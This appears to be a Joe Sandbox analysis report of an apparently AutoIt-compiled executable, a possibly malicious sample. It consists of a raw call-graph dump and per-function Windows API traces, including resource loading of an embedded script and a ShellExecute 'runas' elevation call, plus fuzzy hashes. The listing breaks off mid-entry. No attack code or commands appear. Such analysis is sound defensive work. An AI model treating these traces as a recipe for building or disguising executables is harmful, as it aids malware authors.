98924->98925 98926 a100f8 98924->98926 98938 9cb750 98924->98938 98965 a458a2 235 API calls 2 library calls 98925->98965 98929 a10102 98926->98929 98932 a1010f 98926->98932 98926->98938 98963 a45d33 235 API calls 98929->98963 98950 9cba20 98932->98950 98964 a461d0 235 API calls 2 library calls 98932->98964 98936 a103d9 98936->98936 98937 9dd336 40 API calls 98937->98938 98938->98937 98941 9cba4e 98938->98941 98942 a10322 98938->98942 98949 9cbbe0 40 API calls 98938->98949 98938->98950 98951 9cec40 235 API calls 98938->98951 98952 9ca8c7 22 API calls 98938->98952 98954 9ca81b 41 API calls 98938->98954 98955 9dd2f0 40 API calls 98938->98955 98956 9da01b 235 API calls 98938->98956 98957 9e0242 5 API calls __Init_thread_wait 98938->98957 98958 9dedcd 22 API calls 98938->98958 98959 9e00a3 29 API calls __onexit 98938->98959 98960 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98938->98960 98961 9dee53 82 API calls 98938->98961 98962 9de5ca 235 API calls 98938->98962 98966 9caceb 23 API calls ISource 98938->98966 98967 a1f6bf 23 API calls 98938->98967 98968 a45c0c 82 API calls 98942->98968 98949->98938 98950->98941 98969 a3359c 82 API calls __wsopen_s 98950->98969 98951->98938 98952->98938 98954->98938 98955->98938 98956->98938 98957->98938 98958->98938 98959->98938 98960->98938 98961->98938 98962->98938 98963->98932 98964->98950 98965->98938 98966->98938 98967->98938 98968->98950 98969->98936 98970 9f8402 98975 9f81be 98970->98975 98973 9f842a 98980 9f81ef try_get_first_available_module 98975->98980 98977 9f83ee 98994 9f27ec 26 API calls _abort 98977->98994 98979 9f8343 98979->98973 98987 a00984 98979->98987 98983 9f8338 98980->98983 98990 9e8e0b 40 API calls 2 library calls 98980->98990 98982 9f838c 98982->98983 98991 9e8e0b 40 API calls 2 library calls 98982->98991 98983->98979 98993 9ef2d9 20 API calls _abort 98983->98993 98985 9f83ab 98985->98983 98992 9e8e0b 40 API calls 2 library calls 98985->98992 98995 a00081 98987->98995 98989 a0099f 98989->98973 98990->98982 98991->98985 98992->98983 98993->98977 98994->98979 98996 a0008d ___BuildCatchObject 98995->98996 98997 a0009b 98996->98997 99000 a000d4 98996->99000 99053 9ef2d9 20 API calls _abort 98997->99053 98999 a000a0 99054 9f27ec 26 API calls _abort 98999->99054 99006 a0065b 99000->99006 99005 a000aa __fread_nolock 99005->98989 99056 a0042f 99006->99056 99009 a006a6 99074 9f5221 99009->99074 99010 a0068d 99088 9ef2c6 20 API calls _abort 99010->99088 99013 a006ab 99014 a006b4 99013->99014 99015 a006cb 99013->99015 99090 9ef2c6 20 API calls _abort 99014->99090 99087 a0039a CreateFileW 99015->99087 99019 a006b9 99091 9ef2d9 20 API calls _abort 99019->99091 99020 a000f8 99055 a00121 LeaveCriticalSection __wsopen_s 99020->99055 99022 a00781 GetFileType 99023 a007d3 99022->99023 99024 a0078c GetLastError 99022->99024 99096 9f516a 21 API calls 2 library calls 99023->99096 99094 9ef2a3 20 API calls __dosmaperr 99024->99094 99025 a00692 99089 9ef2d9 20 API calls _abort 99025->99089 99026 a00756 GetLastError 99093 9ef2a3 20 API calls __dosmaperr 99026->99093 99028 a00704 99028->99022 99028->99026 99092 a0039a CreateFileW 99028->99092 99030 a0079a CloseHandle 99030->99025 99032 a007c3 99030->99032 99095 9ef2d9 20 API calls _abort 99032->99095 99034 a00749 99034->99022 99034->99026 99036 a007f4 99038 a00840 99036->99038 99097 a005ab 72 API calls 3 library calls 99036->99097 99037 a007c8 99037->99025 99042 a0086d 99038->99042 99098 a0014d 72 API calls 4 library calls 99038->99098 99041 a00866 99041->99042 99043 a0087e 99041->99043 99044 9f86ae __wsopen_s 29 API calls 99042->99044 99043->99020 99045 a008fc CloseHandle 99043->99045 99044->99020 99099 a0039a CreateFileW 99045->99099 99047 a00927 99048 a00931 GetLastError 99047->99048 99049 a0095d 99047->99049 99100 9ef2a3 20 API calls __dosmaperr 99048->99100 99049->99020 99051 a0093d 99101 9f5333 21 API calls 2 library calls 99051->99101 99053->98999 99054->99005 99055->99005 99057 a00450 99056->99057 99058 a0046a 99056->99058 99057->99058 99109 9ef2d9 20 API calls _abort 99057->99109 99102 a003bf 99058->99102 99060 a004a2 99064 a004d1 99060->99064 99111 9ef2d9 20 API calls _abort 99060->99111 99062 a0045f 99110 9f27ec 26 API calls _abort 99062->99110 99071 a00524 99064->99071 99113 9ed70d 26 API calls 2 library calls 99064->99113 99067 a0051f 99069 a0059e 99067->99069 99067->99071 99068 a004c6 99112 9f27ec 26 API calls _abort 99068->99112 99114 9f27fc 11 API calls _abort 99069->99114 99071->99009 99071->99010 99073 a005aa 99075 9f522d ___BuildCatchObject 99074->99075 99117 9f2f5e EnterCriticalSection 99075->99117 99077 9f5259 99121 9f5000 21 API calls 3 library calls 99077->99121 99080 9f52a4 __fread_nolock 99080->99013 99081 9f5234 99081->99077 99083 9f52c7 EnterCriticalSection 99081->99083 99084 9f527b 99081->99084 99082 9f525e 99082->99084 99122 9f5147 EnterCriticalSection 99082->99122 99083->99084 99085 9f52d4 LeaveCriticalSection 99083->99085 99118 9f532a 99084->99118 99085->99081 99087->99028 99088->99025 99089->99020 99090->99019 99091->99025 99092->99034 99093->99025 99094->99030 99095->99037 99096->99036 99097->99038 99098->99041 99099->99047 99100->99051 99101->99049 99103 a003d7 99102->99103 99104 a003f2 99103->99104 99115 9ef2d9 20 API calls _abort 99103->99115 99104->99060 99106 a00416 99116 9f27ec 26 API calls _abort 99106->99116 99108 a00421 99108->99060 99109->99062 99110->99058 99111->99068 99112->99064 99113->99067 99114->99073 99115->99106 99116->99108 99117->99081 99123 9f2fa6 LeaveCriticalSection 99118->99123 99120 9f5331 99120->99080 99121->99082 99122->99084 99123->99120 99124 9c2de3 99125 9c2df0 __wsopen_s 99124->99125 99126 9c2e09 99125->99126 99127 a02c2b ___scrt_fastfail 99125->99127 99128 9c3aa2 23 API calls 99126->99128 99129 a02c47 GetOpenFileNameW 99127->99129 99130 9c2e12 99128->99130 99131 a02c96 99129->99131 99140 9c2da5 99130->99140 99133 9c6b57 22 API calls 99131->99133 99135 a02cab 99133->99135 99135->99135 99137 9c2e27 99158 9c44a8 99137->99158 99141 a01f50 __wsopen_s 99140->99141 99142 9c2db2 GetLongPathNameW 99141->99142 99143 9c6b57 22 API calls 99142->99143 99144 9c2dda 99143->99144 99145 9c3598 99144->99145 99146 9ca961 22 API calls 99145->99146 99147 9c35aa 99146->99147 99148 9c3aa2 23 API calls 99147->99148 99149 9c35b5 99148->99149 99150 a032eb 99149->99150 99151 9c35c0 99149->99151 99156 a0330d 99150->99156 99194 9dce60 41 API calls 99150->99194 99153 9c515f 22 API calls 99151->99153 99154 9c35cc 99153->99154 99188 9c35f3 99154->99188 99157 9c35df 99157->99137 99159 9c4ecb 94 API calls 99158->99159 99160 9c44cd 99159->99160 99161 a03833 99160->99161 99163 9c4ecb 94 API calls 99160->99163 99162 a32cf9 80 API calls 99161->99162 99164 a03848 99162->99164 99165 9c44e1 99163->99165 99166 a03869 99164->99166 99167 a0384c 99164->99167 99165->99161 99168 9c44e9 99165->99168 99170 9dfe0b 22 API calls 99166->99170 99169 9c4f39 68 API calls 99167->99169 99171 a03854 99168->99171 99172 9c44f5 99168->99172 99169->99171 99187 a038ae 99170->99187 99196 a2da5a 82 API calls 99171->99196 99195 9c940c 136 API calls 2 library calls 99172->99195 99175 a03862 99175->99166 99176 9c2e31 99177 a03a5f 99182 a03a67 99177->99182 99178 9c4f39 68 API calls 99178->99182 99182->99178 99202 a2989b 82 API calls __wsopen_s 99182->99202 99184 9c9cb3 22 API calls 99184->99187 99187->99177 99187->99182 99187->99184 99197 a2967e 22 API calls __fread_nolock 99187->99197 99198 a295ad 42 API calls _wcslen 99187->99198 99199 a30b5a 22 API calls 99187->99199 99200 9ca4a1 22 API calls __fread_nolock 99187->99200 99201 9c3ff7 22 API calls 99187->99201 99189 9c3605 99188->99189 99193 9c3624 __fread_nolock 99188->99193 99191 9dfe0b 22 API calls 99189->99191 99190 9dfddb 22 API calls 99192 9c363b 99190->99192 99191->99193 99192->99157 99193->99190 99194->99150 99195->99176 99196->99175 99197->99187 99198->99187 99199->99187 99200->99187 99201->99187 99202->99182

                                                                      Executed Functions

                                                                      Function 009C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 234 9c42de-9c434d call 9ca961 GetVersionExW call 9c6b57 239 a03617-a0362a 234->239 240 9c4353 234->240 241 a0362b-a0362f 239->241 242 9c4355-9c4357 240->242 245 a03631 241->245 246 a03632-a0363e 241->246 243 9c435d-9c43bc call 9c93b2 call 9c37a0 242->243 244 a03656 242->244 262 9c43c2-9c43c4 243->262 263 a037df-a037e6 243->263 249 a0365d-a03660 244->249 245->246 246->241 248 a03640-a03642 246->248 248->242 251 a03648-a0364f 248->251 252 a03666-a036a8 249->252 253 9c441b-9c4435 GetCurrentProcess IsWow64Process 249->253 251->239 255 a03651 251->255 252->253 256 a036ae-a036b1 252->256 258 9c4494-9c449a 253->258 259 9c4437 253->259 255->244 260 a036b3-a036bd 256->260 261 a036db-a036e5 256->261 264 9c443d-9c4449 258->264 259->264 265 a036ca-a036d6 260->265 266 a036bf-a036c5 260->266 268 a036e7-a036f3 261->268 269 a036f8-a03702 261->269 262->249 267 9c43ca-9c43dd 262->267 270 a03806-a03809 263->270 271 a037e8 263->271 272 9c444f-9c445e LoadLibraryA 264->272 273 a03824-a03828 GetSystemInfo 264->273 265->253 266->253 274 a03726-a0372f 267->274 275 9c43e3-9c43e5 267->275 268->253 277 a03704-a03710 269->277 278 a03715-a03721 269->278 279 a037f4-a037fc 270->279 280 a0380b-a0381a 270->280 276 a037ee 271->276 281 9c449c-9c44a6 GetSystemInfo 272->281 282 9c4460-9c446e GetProcAddress 272->282 287 a03731-a03737 274->287 288 a0373c-a03748 274->288 285 9c43eb-9c43ee 275->285 286 a0374d-a03762 275->286 276->279 277->253 278->253 279->270 280->276 289 a0381c-a03822 280->289 284 9c4476-9c4478 281->284 282->281 283 9c4470-9c4474 GetNativeSystemInfo 282->283 283->284 290 9c447a-9c447b FreeLibrary 284->290 291 9c4481-9c4493 284->291 292 a03791-a03794 285->292 293 9c43f4-9c440f 285->293 294 a03764-a0376a 286->294 295 a0376f-a0377b 286->295 287->253 288->253 289->279 290->291 292->253 296 a0379a-a037c1 292->296 297 a03780-a0378c 293->297 298 9c4415 293->298 294->253 295->253 299 a037c3-a037c9 296->299 300 a037ce-a037da 296->300 297->253 298->253 299->253 300->253
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 009C430D
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • GetCurrentProcess.KERNEL32(?,00A5CB64,00000000,?,?), ref: 009C4422
                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 009C4429
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 009C4454
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 009C4466
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 009C4474
                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 009C447B
                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 009C44A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                      • API String ID: 3290436268-3101561225
                                                                      • Opcode ID: d2a72cfbed6f9d14d1d21903f07271370642fa1c7e60aeb8772afc9451a8713e
                                                                      • Instruction ID: a7d4be8bbca8dca57b9309f072e7228d715272c3326e8eb40ae4b410bfbbb0ae
                                                                      • Opcode Fuzzy Hash: d2a72cfbed6f9d14d1d21903f07271370642fa1c7e60aeb8772afc9451a8713e
                                                                      • Instruction Fuzzy Hash: 5FA1B466F0A3C6DFCB95C7E978806A77FF87B26300B14489ED4419BA71DA24450BDB22
                                                                      Function 009C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 553 9c42a2-9c42ba CreateStreamOnHGlobal 554 9c42bc-9c42d3 FindResourceExW 553->554 555 9c42da-9c42dd 553->555 556 9c42d9 554->556 557 a035ba-a035c9 LoadResource 554->557 556->555 557->556 558 a035cf-a035dd SizeofResource 557->558 558->556 559 a035e3-a035ee LockResource 558->559 559->556 560 a035f4-a03612 559->560 560->556
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,009C50AA,?,?,00000000,00000000), ref: 009C42B2
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009C50AA,?,?,00000000,00000000), ref: 009C42C9
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,009C50AA,?,?,00000000,00000000,?,?,?,?,?,?,009C4F20), ref: 00A035BE
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,009C50AA,?,?,00000000,00000000,?,?,?,?,?,?,009C4F20), ref: 00A035D3
                                                                      • LockResource.KERNEL32(009C50AA,?,?,009C50AA,?,?,00000000,00000000,?,?,?,?,?,?,009C4F20,?), ref: 00A035E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: ff2143145e0d47e7ac1c75860672269faa2e69361ee972beb8c8972febe3365b
                                                                      • Instruction ID: 4c1a8b181437c45f63cf26ed396b4920e7fdb6f5d6c858f8ae4ee4006c987952
                                                                      • Opcode Fuzzy Hash: ff2143145e0d47e7ac1c75860672269faa2e69361ee972beb8c8972febe3365b
                                                                      • Instruction Fuzzy Hash: 1F11AC70600300BFEB219BA5EC49F6B7BBDFBC5B62F20416DF812862A0DB71D800D621
                                                                      Function 00A02BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009C2B6B
                                                                        • Part of subcall function 009C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A91418,?,009C2E7F,?,?,?,00000000), ref: 009C3A78
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00A82224), ref: 00A02C10
                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00A82224), ref: 00A02C17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                      • String ID: runas
                                                                      • API String ID: 448630720-4000483414
                                                                      • Opcode ID: 19a67f483e82c91d6ca31621f76a79749bbe40bc8b0e65c9f96a2cb26763f22c
                                                                      • Instruction ID: 9c533f37d38da4fd23e9cb970d3b50e5db09e89bbfc565c7d8836f1a930c0773
                                                                      • Opcode Fuzzy Hash: 19a67f483e82c91d6ca31621f76a79749bbe40bc8b0e65c9f96a2cb26763f22c
                                                                      • Instruction Fuzzy Hash: 2F11B471A083456AC714FF70E855FBEBBA4ABD6310F44842DF082520A2DF20894AC713
                                                                      Function 00A2DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00A05222), ref: 00A2DBCE
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00A2DBDD
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00A2DBEE
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2DBFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 7f4bd370aad110f1053809aa16aede7ef7b10ddc4b8b5111761c91639fdbd277
                                                                      • Instruction ID: bc931b951e21ddb5f2d829da2ecda9c42bc82696dba2f77b6af81fca00cfc9a1
                                                                      • Opcode Fuzzy Hash: 7f4bd370aad110f1053809aa16aede7ef7b10ddc4b8b5111761c91639fdbd277
                                                                      • Instruction Fuzzy Hash: 84F0A030810B206BC220BBBCAC0D8AE376CAE01336B104712F836D24E1FBB05956C696
                                                                      Function 009CD730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 009CD807
                                                                      • timeGetTime.WINMM ref: 009CDA07
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009CDB28
                                                                      • TranslateMessage.USER32(?), ref: 009CDB7B
                                                                      • DispatchMessageW.USER32(?), ref: 009CDB89
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009CDB9F
                                                                      • Sleep.KERNEL32(0000000A), ref: 009CDBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 2189390790-0
                                                                      • Opcode ID: 4d46511678abac43e3746ab94af5012f1c1ba0443a3c550dccd44d30a1d3a57f
                                                                      • Instruction ID: 2ff8e69507bb01f7135346101a1455a69dad54af49fc6834cc46cd269a111c88
                                                                      • Opcode Fuzzy Hash: 4d46511678abac43e3746ab94af5012f1c1ba0443a3c550dccd44d30a1d3a57f
                                                                      • Instruction Fuzzy Hash: AA420330A09341EFD728CF24C885FAAB7E5BF85304F14892EE59687291D774E895CB93
                                                                      Function 009C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 009C2D07
                                                                      • RegisterClassExW.USER32(00000030), ref: 009C2D31
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C2D42
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 009C2D5F
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C2D6F
                                                                      • LoadIconW.USER32(000000A9), ref: 009C2D85
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 28e8af5f8401d5d756560afd03ddc77ac7a352efc39e26336d46f93dfe80f958
                                                                      • Instruction ID: 03080dfd5ba79f26170511d9389803a6b9aaf6c618df5b30eafcb27fd074d97c
                                                                      • Opcode Fuzzy Hash: 28e8af5f8401d5d756560afd03ddc77ac7a352efc39e26336d46f93dfe80f958
                                                                      • Instruction Fuzzy Hash: 4521B2B5A01319AFDB00DFE4EC49B9DBBB4FB08B15F10811AF911A62A4DBB14545CF91
                                                                      Function 00A0065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 302 a0065b-a0068b call a0042f 305 a006a6-a006b2 call 9f5221 302->305 306 a0068d-a00698 call 9ef2c6 302->306 311 a006b4-a006c9 call 9ef2c6 call 9ef2d9 305->311 312 a006cb-a00714 call a0039a 305->312 313 a0069a-a006a1 call 9ef2d9 306->313 311->313 321 a00781-a0078a GetFileType 312->321 322 a00716-a0071f 312->322 323 a0097d-a00983 313->323 324 a007d3-a007d6 321->324 325 a0078c-a007bd GetLastError call 9ef2a3 CloseHandle 321->325 327 a00721-a00725 322->327 328 a00756-a0077c GetLastError call 9ef2a3 322->328 330 a007d8-a007dd 324->330 331 a007df-a007e5 324->331 325->313 339 a007c3-a007ce call 9ef2d9 325->339 327->328 332 a00727-a00754 call a0039a 327->332 328->313 335 a007e9-a00837 call 9f516a 330->335 331->335 336 a007e7 331->336 332->321 332->328 345 a00847-a0086b call a0014d 335->345 346 a00839-a00845 call a005ab 335->346 336->335 339->313 352 a0086d 345->352 353 a0087e-a008c1 345->353 346->345 351 a0086f-a00879 call 9f86ae 346->351 351->323 352->351 355 a008e2-a008f0 353->355 356 a008c3-a008c7 353->356 359 a008f6-a008fa 355->359 360 a0097b 355->360 356->355 358 a008c9-a008dd 356->358 358->355 359->360 361 a008fc-a0092f CloseHandle call a0039a 359->361 360->323 364 a00931-a0095d GetLastError call 9ef2a3 call 9f5333 361->364 365 a00963-a00977 361->365 364->365 365->360
                                                                      APIs
                                                                        • Part of subcall function 00A0039A: CreateFileW.KERNELBASE(00000000,00000000,?,00A00704,?,?,00000000,?,00A00704,00000000,0000000C), ref: 00A003B7
                                                                      • GetLastError.KERNEL32 ref: 00A0076F
                                                                      • __dosmaperr.LIBCMT ref: 00A00776
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00A00782
                                                                      • GetLastError.KERNEL32 ref: 00A0078C
                                                                      • __dosmaperr.LIBCMT ref: 00A00795
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A007B5
                                                                      • CloseHandle.KERNEL32(?), ref: 00A008FF
                                                                      • GetLastError.KERNEL32 ref: 00A00931
                                                                      • __dosmaperr.LIBCMT ref: 00A00938
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: eb78b18d240d2fcff98fff7a36e27a6acf7643858501b22ca381d61826df7c77
                                                                      • Instruction ID: b2ac5b674ec2303699e7b87b71a110627bf8a0834f5a138eaa30ed7a405af2f6
                                                                      • Opcode Fuzzy Hash: eb78b18d240d2fcff98fff7a36e27a6acf7643858501b22ca381d61826df7c77
                                                                      • Instruction Fuzzy Hash: 1DA10432A046488FDF19EFA8E851FAE7BA0AB46320F14415AF8159F3D1DB359D13CB91
                                                                      Function 009C344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 009C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A91418,?,009C2E7F,?,?,?,00000000), ref: 009C3A78
                                                                        • Part of subcall function 009C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009C3379
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009C356A
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A0318D
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A031CE
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A03210
                                                                      • _wcslen.LIBCMT ref: 00A03277
                                                                      • _wcslen.LIBCMT ref: 00A03286
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
